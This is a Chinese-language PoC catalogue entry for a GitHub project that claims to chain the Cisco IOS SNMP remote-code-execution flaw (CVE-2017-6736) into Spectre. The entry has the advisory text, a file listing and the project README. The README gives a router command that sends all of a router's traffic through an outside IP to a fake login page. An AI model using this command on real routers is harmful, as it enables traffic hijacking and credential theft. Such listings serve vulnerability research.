POC详情: 4bad04bcc2f9796216f9231f853a21a97e473f09

来源
https://github.com/GarnetSunset/CiscoSpectreTakeover
关联漏洞
标题: Cisco IOS和IOS XE Simple Network Management Protocol子系统缓冲区错误漏洞 (CVE-2017-6736)
描述:Cisco IOS和IOS XE都是美国思科(Cisco)公司为其网络设备开发的操作系统。Simple Network Management Protocol(SNMP)subsystem是其中的一个用于网络设备管理信息交换的简单网络管理子系统。 Cisco IOS 12.0版本至12.4版本、15.0版本至15.6版本和IOS XE 2.2版本至3.17版本中的SNMP子系统中存在安全漏洞。远程攻击者可通过向受影响系统发送特制的SNMP数据包利用该漏洞在受影响的系统上执行任意代码或造成系统重启。以下版本
描述
A POC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715)
介绍
# CiscoSpectreTakeover
A **PoC** chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715)

[![forthebadge](http://forthebadge.com/images/badges/mom-made-pizza-rolls.svg)](http://forthebadge.com)

## Credits

Cisco RCE Exploit submodule by artkond: https://github.com/artkond/cisco-snmp-rce

JS Spectre Chrome POC by ascendr: https://github.com/ascendr/spectre-chrome

Tested on a Cisco 1841+2600 Router.

After running the RCE exploit. As config, run:

```Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49```

This will force all traffic through the Spectre login page I created. 
At a later date I will add a better version that addresses actually going to websites.
文件快照

 [4.0K]  /data/pocs/4bad04bcc2f9796216f9231f853a21a97e473f09
├── [  69]  ciscoCommands.txt
├── [4.0K]  cisco-snmp-rce
├── [1.7K]  connect.png
├── [ 597]  index.html
├── [   9]  landing.html
├── [7.4K]  logo.png
├── [ 736]  README.md
├── [ 373]  readyGo.bat
└── [4.0K]  spectre-chrome

2 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。